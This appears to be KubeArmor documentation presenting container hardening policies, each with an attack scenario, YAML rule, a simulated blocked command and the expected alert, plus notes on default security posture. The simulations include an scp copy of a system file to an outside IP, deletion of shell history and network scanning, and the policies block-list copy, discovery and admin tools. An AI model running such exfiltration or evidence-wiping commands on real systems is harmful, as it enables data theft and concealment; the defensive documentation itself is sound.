Listens for incoming client connections and handles RPC calls.

feeder/feeder.go

Exposes event streams to external clients.

LogService

Implementation of the gRPC service methods (WatchAlerts, WatchLogs).

feeder/logServer.go

Manages client connections and streams events.

EventStructs

Internal data structure (maps of channels) holding connections for each client type.

feeder/feeder.go

Enables broadcasting events to multiple clients.

Protobuf Defs

Define the structure of Alert and Log messages.

protobuf/kubearmor.proto

Standardizes the output format.

PushLog method

Method on the Feeder called by the Daemon to send new events.

feeder/feeder.go

Point of entry for events into the feeder.

cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: only-allow-nginx-exec
spec:
  selector:
    matchLabels:
      app: nginx
  file:
    matchDirectories:
    - dir: /
      recursive: true  
  process:
    matchPaths:
    - path: /usr/sbin/nginx
    - path: /bin/bash
  action:
    Allow
EOF
kubectl exec -it $POD -- bash -c "chroot"
KubeArmor Policy Templates
KubeArmorPolicy
KubeArmorHostPolicy
MITRE TTPs
Security Technical Implementation Guides (STIGs)
NIST SP 800-53A
Center for Internet Security (CIS)
▶️ Watch FGSM Attack Video
▶️ Watch Keras Inject Video
View PDF: Securing_NVIDIA_NIM.pdf
default security posture
configuring security posture

Advanced

File Copy: Prevent file copy using standard utilities.

Description

Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

Attack Scenario

It's important to note that file copy tools can be leveraged by attackers for exfiltrating sensitive data and transferring malicious payloads into the workloads. Additionally, it can also assist in lateral movement within the system. It's crucial to take proactive measures to prevent these attacks from occurring. Attack Type Credential Access, Lateral movements, Information Disclosure Actual Attack DarkBeam Data Breach, Shields Health Care Group data breach

Compliance

  • MITRE_TA0010_exfiltration

  • NIST_800-53_SI-4(18)

  • MITRE_TA0008_lateral_movement

Policy

File Copy

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-wordpress-remote-file-copy
  namespace: wordpress-mysql
spec:
  action: Block
  message: Alert! remote file copy tools execution prevented.
  process:
    matchPaths:
    - path: /usr/bin/rsync
    - path: /bin/rsync
    - path: /usr/bin/scp
    - path: /bin/scp
    - path: /usr/bin/scp
    - path: /bin/scp
  selector:
    matchLabels:
      app: wordpress
  severity: 5
  tags:
  - MITRE
  - MITRE_TA0008_lateral_movement
  - MITRE_TA0010_exfiltration
  - MITRE_TA0006_credential_access
  - MITRE_T1552_unsecured_credentials
  - NIST_800-53_SI-4(18)
  - NIST
  - NIST_800-53
  - NIST_800-53_SC-4

Simulation

root@wordpress-fb448db97-wj7n7:/usr/bin# scp /etc/ca-certificates.conf 104.192.3.74:/mine/                              
bash: /usr/bin/scp: Permission denied                                                                                   
root@wordpress-fb448db97-wj7n7:/usr/bin#     

Expected Alert

{
  "Action": "Block",
  "ClusterName": "d3mo",
  "ContainerID": "548176888fca6bb6d66633794f3d5f9d54930a9d9f43d4f05c11de821c758c0f",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HostName": "master-node",
  "HostPID": 72178,
  "HostPPID": 30490,
  "Labels": "app=wordpress",
  "Message": "Alert! remote file copy tools execution prevented.",
  "NamespaceName": "wordpress-mysql",
  "Operation": "Process",
  "Owner": {
    "Name": "wordpress",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 259,
  "PPID": 193,
  "ParentProcessName": "/bin/bash",
  "PodName": "wordpress-fb448db97-wj7n7",
  "PolicyName": "harden-wordpress-remote-file-copy",
  "ProcessName": "/usr/bin/scp",
  "Resource": "/usr/bin/scp /etc/ca-certificates.conf 104.192.3.74:/mine/",
  "Result": "Permission denied",
  "Severity": "5",
  "Source": "/bin/bash",
  "Tags": "MITRE,MITRE_TA0008_lateral_movement,MITRE_TA0010_exfiltration,MITRE_TA0006_credential_access,MITRE_T1552_unsecured_credentials,NIST_800-53_SI-4(18),NIST,NIST_800-53,NIST_800-53_SC-4",
  "Timestamp": 1696487496,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-05T06:31:36.085860Z",
  "cluster_id": "2302",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

Network Access: Process based network access control

Description

Typically, within a pod/container, there are only specific processes that need to use network access. KubeArmor allows one to specify the set of binaries that are allowed to use network primitives such as TCP, UDP, and Raw sockets and deny everyone else.

Attack Scenario

In a possible attack scenario, an attacker binary may attempt to send a beacon to its Command and Control (C&C) Server. Additionally, the binary may use network primitives to exfiltrate pod/container data and configuration. It's important to monitor network traffic and take proactive measures to prevent these attacks from occurring, such as implementing proper access controls and segmenting the network. Attack Type Denial of Service(DoS), Distributed Denial of Service(DDoS) Actual Attack DDoS attacks on websites of public institutions in Belgium, DDoS attack on the website of a city government in Germany

Compliance

  • Network Access

Policy

Network Access

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: restrict-proccess
  namespace: default
spec:
  severity: 4
  selector:
    matchLabels:
      app: nginx
  network:
    matchProtocols:
    - protocol: tcp
      fromSource:
      - path: /usr/bin/wget
    - protocol: udp
      fromSource:
      - path: /usr/bin/wget
  action:
    Allow

Simulation

Set the default security posture to default-deny

kubectl annotate ns default kubearmor-network-posture=block --overwrite
kubectl exec -it nginx-77b4fdf86c-x7sdm -- bash
root@nginx-77b4fdf86c-x7sdm:/# curl www.google.com
curl: (6) Could not resolve host: www.google.com
root@nginx-77b4fdf86c-x7sdm:/# wget https://github.com/kubearmor/KubeArmor/blob/main/examples/wordpress-mysql/original/wordpress-mysql-deployment.yaml
--2023-10-06 11:08:58--  https://github.com/kubearmor/KubeArmor/blob/main/examples/wordpress-mysql/original/wordpress-mysql-deployment.yaml
Resolving github.com (github.com)... 20.207.73.82
Connecting to github.com (github.com)|20.207.73.82|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15051 (15K) [text/plain]
Saving to: 'wordpress-mysql-deployment.yaml.2'

wordpress-mysql-deployment.ya 100%[=================================================>]  14.70K  --.-KB/s    in 0.08s

2023-10-06 11:08:59 (178 KB/s) - 'wordpress-mysql-deployment.yaml.2' saved [15051/15051]

Expected Alert

{
  "Action": "Block",
  "ClusterName": "0-trust",
  "ContainerID": "20a6333c6a46e0da32b3062f0ba76e9aed4fc5ef51f5ee8aec5b980963cedea3",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755",
  "ContainerName": "nginx",
  "Data": "syscall=SYS_SOCKET",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 73952,
  "HostPPID": 73945,
  "Labels": "app=nginx",
  "NamespaceName": "default",
  "Operation": "Network",
  "Owner": {
    "Name": "nginx",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 532,
  "PPID": 525,
  "ParentProcessName": "/usr/bin/bash",
  "PodName": "nginx-77b4fdf86c-x7sdm",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/bin/curl",
  "Resource": "domain=AF_INET type=SOCK_DGRAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
  "Result": "Permission denied",
  "Source": "/usr/bin/curl www.google.com",
  "Timestamp": 1696588301,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-06T10:31:41.935146Z",
  "cluster_id": "4291",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}
/tmp/ noexec: Do not allow execution of binaries from /tmp/ folder.

Description

If provided the necessary privileges, users have the ability to install software in organizational information systems. To maintain control over the types of software installed, organizations identify permitted and prohibited actions regarding software installation. Prohibited software installations may include, for example, software with unknown or suspect pedigrees or software that organizations consider potentially malicious.

Attack Scenario

In an attack scenario, a hacker may attempt to inject malicious scripts into the /tmp folder through a web application exploit. Once the script is uploaded, the attacker may try to execute it on the server in order to take it down. By hardening the /tmp folder, the attacker will not be able to execute the script, preventing such attacks. It's essential to implement these security measures to protect against these types of attacks and ensure the safety of the system. Attack Type System Failure, System Breach Actual Attack Shields Health Care Group data breach, MOVEit Breach

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 1.1.5

  • Control-Id: 1.1.10

Policy

/tmp/ noexec

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-exec-inside-tmp
  namespace: wordpress-mysql
spec:
  tags:
  - CIS
  - CIS-control-1.1.5
  message: Alert! Execution attempted inside tmp folder
  selector:
    matchLabels:
      app: wordpress
  process:
    matchDirectories:
    - dir: /tmp/
      recursive: true
  action: Block

Simulation

root@wordpress-fb448db97-wj7n7:/var/tmp# ls /var/tmp                                                                    xvzf                                                                                                                    
root@wordpress-fb448db97-wj7n7:/var/tmp# /var/tmp/xvzf                                                                  
bash: /var/tmp/xvzf: Permission denied                                                                                  
root@wordpress-fb448db97-wj7n7:/var/tmp#  

Expected Alert

{
  "Action": "Block",
  "ClusterName": "d3mo",
  "ContainerID": "548176888fca6bb6d66633794f3d5f9d54930a9d9f43d4f05c11de821c758c0f",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_OPEN flags=O_WRONLY|O_CREAT|O_EXCL|O_TRUNC",
  "Enforcer": "AppArmor",
  "HostName": "master-node",
  "HostPID": 30490,
  "HostPPID": 6119,
  "Labels": "app=wordpress",
  "Message": "Alert! Execution attempted inside /tmp",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "wordpress",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 193,
  "PPID": 6119,
  "ParentProcessName": "/var/lib/rancher/k3s/data/24a53467e274f21ca27cec302d5fbd58e7176daf0a47a2c9ce032ee877e0979a/bin/containerd-shim-runc-v2",
  "PodName": "wordpress-fb448db97-wj7n7",
  "PolicyName": "ksp-block-exec-inside-tmp",
  "ProcessName": "/bin/bash",
  "Resource": "/tmp/sh-thd-2512146865",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/bin/bash",
  "Tags": "CIS,CIS_Linux",
  "Timestamp": 1696492433,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-05T07:53:53.259403Z",
  "cluster_id": "2302",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

Admin tools: Do not allow execution of administrative/maintenance tools inside the pods.

Description

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.

Attack Scenario

It's important to note that attackers with permissions could potentially run 'kubectl exec' to execute malicious code and compromise resources within a cluster. It's crucial to monitor the activity within the cluster and take proactive measures to prevent these attacks from occurring. Attack Type Command Injection, Lateral Movements, etc. Actual Attack Target cyberattack, Supply Chain Attacks

Compliance

  • NIST_800-53_AU-2

  • MITRE_T1609_container_administration_command

  • NIST_800-53_SI-4

Policy

Admin tools

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-dvwa-web-k8s-client-tool-exec
  namespace: default
spec:
  action: Block
  message: Alert! k8s client tool executed inside container.
  process:
    matchPaths:
    - path: /usr/local/bin/kubectl
    - path: /usr/bin/kubectl
    - path: /usr/local/bin/docker
    - path: /usr/bin/docker
    - path: /usr/local/bin/crictl
    - path: /usr/bin/crictl
  selector:
    matchLabels:
      app: dvwa-web
      tier: frontend
  severity: 5
  tags:
  - MITRE_T1609_container_administration_command
  - MITRE_TA0002_execution
  - MITRE_T1610_deploy_container
  - MITRE
  - NIST_800-53
  - NIST_800-53_AU-2
  - NIST_800-53_SI-4
  - NIST

Simulation

kubectl exec -it dvwa-web-566855bc5b-4j4vl -- bash
root@dvwa-web-566855bc5b-4j4vl:/var/www/html# kubectl
bash: /usr/bin/kubectl: Permission denied
root@dvwa-web-566855bc5b-4j4vl:/var/www/html#

Expected Alert

{
  "ATags": null,
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "32015ebeea9e1f4d4e7dbf6608c010ef2b34c48f1af11a5c6f0ea2fd27c6ba6c",
  "ContainerImage": "docker.io/cytopia/dvwa:php-8.1@sha256:f7a9d03b1dfcec55757cc39ca2470bdec1618b11c4a51052bb4f5f5e7d78ca39",
  "ContainerName": "dvwa",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HashID": "1167b21433f2a4e78a4c6875bb34232e6a2b3c8535e885bb4f9e336fd2801d92",
  "HostName": "aditya",
  "HostPID": 38035,
  "HostPPID": 37878,
  "Labels": "tier=frontend,app=dvwa-web",
  "Message": "",
  "NamespaceName": "default",
  "Operation": "Process",
  "Owner": {
    "Name": "dvwa-web",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 554,
  "PPID": 548,
  "PodName": "dvwa-web-566855bc5b-4j4vl",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/bin/kubectl",
  "Resource": "/usr/bin/kubectl",
  "Result": "Permission denied",
  "Severity": "",
  "Source": "/bin/bash",
  "Tags": "",
  "Timestamp": 1696326880,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T09:54:40.056501Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

References

Discovery tools: Do not allow discovery/search of tools/configuration.

Description

Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system

Attack Scenario

Adversaries can potentially use information related to services, remote hosts, and local network infrastructure devices, including those that may be vulnerable to remote software exploitation to perform malicious attacks like exploiting open ports and injecting payloads to get remote shells. It's crucial to take proactive measures to prevent these attacks from occurring, such as implementing proper network segmentation and hardening network devices. Attack Type Reconnaissance, Brute force, Command Injection Actual Attack Microsoft exchange server attack 2021

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 6.3

Policy

Discovery tools

Version: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-dvwa-web-network-service-scanning
  namespace: default
spec:
  action: Block
  message: Network service has been scanned!
  process:
    matchPaths:
    - path: /usr/bin/netstat
    - path: /bin/netstat
    - path: /usr/sbin/ip
    - path: /usr/bin/ip
    - path: /sbin/ip
    - path: /bin/ip
    - path: /usr/sbin/iw
    - path: /sbin/iw
    - path: /usr/sbin/ethtool
    - path: /sbin/ethtool
    - path: /usr/sbin/ifconfig
    - path: /sbin/ifconfig
    - path: /usr/sbin/arp
    - path: /sbin/arp
    - path: /usr/sbin/iwconfig
    - path: /sbin/iwconfig
  selector:
    matchLabels:
      app: dvwa-web
      tier: frontend
  severity: 5
  tags:
  - MITRE
  - FGT1046
  - CIS

Simulation

kubectl exec -it dvwa-web-566855bc5b-xtgwq -- bash
root@dvwa-web-566855bc5b-xtgwq:/var/www/html# netstat
bash: /bin/netstat: Permission denied
root@dvwa-web-566855bc5b-xtgwq:/var/www/html# ifconfig
bash: /sbin/ifconfig: Permission denied
root@dvwa-web-566855bc5b-xtgwq:/var/www/html#
root@dvwa-web-566855bc5b-xtgwq:/var/www/html# arp
bash: /usr/sbin/arp: Permission denied

Expected Alert

{
  "Action": "Block",
  "ClusterName": "no-trust",
  "ContainerID": "e8ac2e227d293e76ab81a34945b68f72a2618ed3275ac64bb6a82f9cd2d014f1",
  "ContainerImage": "docker.io/cytopia/dvwa:php-8.1@sha256:f7a9d03b1dfcec55757cc39ca2470bdec1618b11c4a51052bb4f5f5e7d78ca39",
  "ContainerName": "dvwa",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 35592,
  "HostPPID": 35557,
  "Labels": "tier=frontend,app=dvwa-web",
  "Message": "Network service has been scanned!",
  "NamespaceName": "default",
  "Operation": "Process",
  "Owner": {
    "Name": "dvwa-web",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 989,
  "PPID": 983,
  "ParentProcessName": "/bin/bash",
  "PodName": "dvwa-web-566855bc5b-npjn8",
  "PolicyName": "harden-dvwa-web-network-service-scanning",
  "ProcessName": "/bin/netstat",
  "Resource": "/bin/netstat",
  "Result": "Permission denied",
  "Severity": "5",
  "Source": "/bin/bash",
  "Tags": "MITRE,FGT1046,CIS",
  "Timestamp": 1696501152,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-05T10:19:12.809606Z",
  "cluster_id": "4225",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

Logs delete: Do not allow external tooling to delete logs/traces of critical components.

Description

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Attack Scenario

It's important to note that removal of indicators related to intrusion activity may interfere with event collection, reporting, or other processes used to detect such activity. This can compromise the integrity of security solutions by causing notable events to go unreported. Additionally, this activity may impede forensic analysis and incident response, due to a lack of sufficient data to determine what occurred. It's crucial to ensure that all relevant indicators are properly monitored and reported to prevent such issues from occurring. Attack Type Integrity Threats, Data Manipulation Actual Attack NetWalker, Conti, DarkSide RaaS

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 6.6

  • Control-Id: 7.6.2

  • Control-Id: 7.6.3

  • NIST_800-53_CM-5

Policy

Logs delete

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: harden-nginx-shell-history-mod
  namespace: default
spec:
  action: Block
  file:
    matchPaths:
    - fromSource:
      - path: /usr/bin/shred
      - path: /usr/bin/rm
      - path: /bin/mv
      - path: /bin/rm
      - path: /usr/bin/mv
      path: /root/*_history
    - fromSource:
      - path: /usr/bin/shred
      - path: /usr/bin/rm
      - path: /bin/rm
      - path: /bin/mv
      - path: /usr/bin/mv
      path: /home/*/*_history
  message: Alert! shell history modification or deletion detected and prevented
  process:
    matchPaths:
    - path: /usr/bin/shred
    - path: /usr/bin/rm
    - path: /bin/mv
    - path: /bin/rm
    - path: /usr/bin/mv
  selector:
    matchLabels:
      app: nginx
  severity: 5
  tags:
  - CIS
  - NIST_800-53
  - NIST_800-53_CM-5
  - NIST_800-53_AU-6(8)
  - MITRE_T1070_indicator_removal_on_host
  - MITRE
  - MITRE_T1036_masquerading

Simulation

kubectl exec -it nginx-77b4fdf86c-x7sdm -- bash
root@nginx-77b4fdf86c-x7sdm:/# rm ~/.bash_history
rm: cannot remove '/root/.bash_history': Permission denied
root@nginx-77b4fdf86c-x7sdm:/# rm ~/.bash_history
rm: cannot remove '/root/.bash_history': Permission denied

Expected Alert

{
  "Action": "Block",
  "ClusterName": "0-trust",
  "ContainerID": "20a6333c6a46e0da32b3062f0ba76e9aed4fc5ef51f5ee8aec5b980963cedea3",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755",
  "ContainerName": "nginx",
  "Data": "syscall=SYS_UNLINKAT flags=",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 43917,
  "HostPPID": 43266,
  "Labels": "app=nginx",
  "NamespaceName": "default",
  "Operation": "File",
  "Owner": {
    "Name": "nginx",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 392,
  "PPID": 379,
  "ParentProcessName": "/usr/bin/bash",
  "PodName": "nginx-77b4fdf86c-x7sdm",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/bin/rm",
  "Resource": "/root/.bash_history",
  "Result": "Permission denied",
  "Source": "/usr/bin/rm /root/.bash_history",
  "Timestamp": 1696577978,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-06T07:39:38.182538Z",
  "cluster_id": "4291",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

ICMP control: Do not allow scanning tools to use ICMP for scanning the network.

Description

The Internet Control Message Protocol (ICMP) allows Internet hosts to notify each other of errors and allows diagnostics and troubleshooting for system administrators. Because ICMP can also be used by a potential adversary to perform reconnaissance against a target network, and due to historical denial-of-service bugs in broken implementations of ICMP, some network administrators block all ICMP traffic as a network hardening measure

Attack Scenario

Adversaries may use scanning tools that utilize Internet Control Message Protocol (ICMP) to perform reconnaissance against a target network and identify potential loopholes. It's crucial to monitor network traffic and take proactive measures to prevent these attacks from occurring, such as implementing proper firewall rules and network segmentation. Additionally, it's important to stay up-to-date with the latest security patches to prevent known vulnerabilities from being exploited. Attack Type Network Flood, DoS(Denial of Service) Actual Attack Ping of Death(PoD)

Compliance

  • ICMP Control

Policy

ICMP Control

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: restrict-scanning-tools
  namespace: default
spec:
  severity: 4
  selector:
    matchLabels:
      app: nginx
  network:
    matchProtocols:
    - protocol: icmp
      fromSource:
      - path: /usr/bin/ping
    - protocol: udp
      fromSource:
      - path: /usr/bin/ping
  action: Allow
  message: Scanning tool has been detected

Simulation

kubectl exec -it nginx-77b4fdf86c-x7sdm -- bash
root@nginx-77b4fdf86c-x7sdm:/# hping3 www.google.com
Unable to resolve 'www.google.com'
root@nginx-77b4fdf86c-x7sdm:/# hping3 127.0.0.1
Warning: Unable to guess the output interface
[get_if_name] socket(AF_INET, SOCK_DGRAM, 0): Permission denied
[main] no such device
root@nginx-77b4fdf86c-x7sdm:/# ping google.com
PING google.com (216.58.200.206) 56(84) bytes of data.
64 bytes from nrt12s12-in-f206.1e100.net (216.58.200.206): icmp_seq=1 ttl=109 time=51.9 ms
64 bytes from nrt12s12-in-f206.1e100.net (216.58.200.206): icmp_seq=2 ttl=109 time=60.1 ms
^C
--- google.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 51.917/56.005/60.094/4.088 ms

Expected Alert

{
  "Action": "Block",
  "ClusterName": "0-trust",
  "ContainerID": "20a6333c6a46e0da32b3062f0ba76e9aed4fc5ef51f5ee8aec5b980963cedea3",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755",
  "ContainerName": "nginx",
  "Data": "syscall=SYS_SOCKET",
  "Enforcer": "AppArmor",
  "HostName": "aditya",
  "HostPID": 86904,
  "HostPPID": 86860,
  "Labels": "app=nginx",
  "NamespaceName": "default",
  "Operation": "Network",
  "Owner": {
    "Name": "nginx",
    "Namespace": "default",
    "Ref": "Deployment"
  },
  "PID": 1064,
  "PPID": 1058,
  "ParentProcessName": "/usr/bin/bash",
  "PodName": "nginx-77b4fdf86c-x7sdm",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/usr/sbin/hping3",
  "Resource": "domain=AF_INET type=SOCK_DGRAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
  "Result": "Permission denied",
  "Source": "/usr/sbin/hping3 www.google.com",
  "Timestamp": 1696593032,
  "Type": "MatchedPolicy",
  "UpdatedTime": "2023-10-06T11:50:32.098937Z",
  "cluster_id": "4291",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}
Restrict Capabilities: Do not allow capabilities that can be leveraged by the attacker.

Description

Containers run with a default set of capabilities as assigned by the Container Runtime. Capabilities are parts of the rights generally granted on a Linux system to the root user. In many cases applications running in containers do not require any capabilities to operate, so from the perspective of the principal of least privilege use of capabilities should be minimized.

Attack Scenario

Kubernetes by default connects all the containers running in the same node (even if they belong to different namespaces) down to Layer 2 (ethernet). Every pod running in the same node is going to be able to communicate with any other pod in the same node (independently of the namespace) at ethernet level (layer 2). This allows a malicious containers to perform an ARP spoofing attack to the containers on the same node and capture their traffic. Attack Type Reconnaissance, Spoofing Actual Attack Recon through P.A.S. Webshell, NBTscan

Compliance

  • CIS Kubernetes

  • Control Id: 5.2.8 - Minimize the admission of containers with the NET_RAW capability

  • Control Id: 5.2.9 - Minimize the admission of containers with capabilities assigned

Policy

Restrict Capabilities

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-ubuntu-1-cap-net-raw-block
  namespace: multiubuntu
spec:
  severity: 1
  selector:
    matchLabels:
      container: ubuntu-1
  capabilities:
    matchCapabilities:
    - capability: net_raw
  action:
    Block

Simulation

root@ubuntu-1-deployment-f987bd4d6-xzcb8:/# tcpdump
tcpdump: eth0: You don't have permission to capture on that device
(socket: Operation not permitted)
root@ubuntu-1-deployment-f987bd4d6-xzcb8:/#    

Expected Alert

{
    "Action":"Block",
    "ClusterName":"k3sn0d3",
    "ContainerID":"aaf2118edcc20b3b04a0fae6164f957993bf3c047fd8cb33bc37ac7d0175e848",
    "ContainerImage":"docker.io/kubearmor/ubuntu-w-utils:0.1@sha256:b4693b003ed1fbf7f5ef2c8b9b3f96fd853c30e1b39549cf98bd772fbd99e260",
    "ContainerName":"ubuntu-1-container",
    "Data":"syscall=SYS_SOCKET",
    "Enforcer":"AppArmor",
    "HashID":"dd12f0f12a75b30d47c5815f93412f51b259b74ac0eccc9781b6843550f694a3",
    "HostName":"worker-node02",
    "HostPID":38077,
    "HostPPID":38065,
    "Labels":"container=ubuntu-1 group=group-1",
    "Message":"",
    "NamespaceName":"multiubuntu",
    "Operation":"Network",
    "Owner":{
        "Name":"ubuntu-1-deployment",
        "Namespace":"multiubuntu",
        "Ref":"Deployment"
    },
    "PID":124,
    "PPID":114,
    "PodName":"ubuntu-1-deployment-f987bd4d6-xzcb8",
    "PolicyName":"ksp-ubuntu-1-cap-net-raw-block",
    "ProcessName":"/usr/sbin/tcpdump",
    "Resource":"domain=AF_PACKET type=SOCK_RAW protocol=768",
    "Result":"Operation not permitted",
    "Severity":"1",
    "Source":"/usr/sbin/tcpdump",
    "Tags":"",
    "Timestamp":1705405378,
    "Type":"MatchedPolicy",
    "UID":0,
    "UpdatedTime":"2024-01-16T11:42:58.662928Z",
    "UpdatedTimeISO":"2024-01-16T11:42:58.662Z",
    "cluster_id":"16402",
    "component_name":"kubearmor",
    "instanceGroup":"0",
    "instanceID":"0",
    "workload":"1"
}

References

Security Posture

There are two default mode of operations available block and audit. block mode blocks all the operations that are not allowed in the policy. audit generates telemetry events for operations that would have been blocked otherwise.

KubeArmor has 4 types of resources: Process, File, Network and Capabilities. Default Posture is configurable for each of the resources seperately except Process. Process based operations are treated under File resource only.

Configuring Default Posture

Global Default Posture

Note By default, KubeArmor set the Global default posture to audit

Global default posture is configured using configuration options passed to KubeArmor using configuration file

defaultFilePosture: block # or audit
defaultNetworkPosture: block # or audit
defaultCapabilitiesPosture: block # or audit

Or using command line flags with the KubeArmor binary

  -defaultFilePosture string
    	configuring default enforcement action in global file context [audit,block] (default "block")
  -defaultNetworkPosture string
    	configuring default enforcement action in global network context [audit,block] (default "block")
  -defaultCapabilitiesPosture string
    	configuring default enforcement action in global capability context [audit,block] (default "block")

Namespace Default Posture

We use namespace annotations to configure default posture per namespace. Supported annotations keys are kubearmor-file-posture,kubearmor-network-posture and kubearmor-capabilities-posture with values block or audit. If a namespace is annotated with a supported key and an invalid value ( like kubearmor-file-posture=invalid), KubeArmor will update the value with the global default posture ( i.e. to kubearmor-file-posture=block).

Example

Let's start KubeArmor with configuring default network posture to audit in the following YAML.

 sudo env KUBEARMOR_CFG=/path/to/kubearmor.yaml ./kubearmor

Contents of kubearmor.yaml

defaultNetworkPosture: audit

Here's a sample policy to allow tcp connections from curl binary.

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-ubuntu-5-net-tcp-allow-curl
  namespace: multiubuntu
spec:
  severity: 8
  selector:
    matchLabels:
      container: ubuntu-5
  network:
    matchProtocols:
    - protocol: tcp
      fromSource:
      - path: /usr/bin/curl
  action:
    Allow

Inside the ubuntu-5-deployment, if we try to access tcp using curl. It works as expected with no telemetry generated.

root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl 142.250.193.46
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>

If we try to access udp using curl, a bunch of telemetry is generated for the udp access.

root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>

curl google.com requires UDP for DNS resolution.

Generated alert has Policy Name DefaultPosture and Action as Audit

== Alert / 2022-03-21 12:56:32.999475 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: DefaultPosture
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
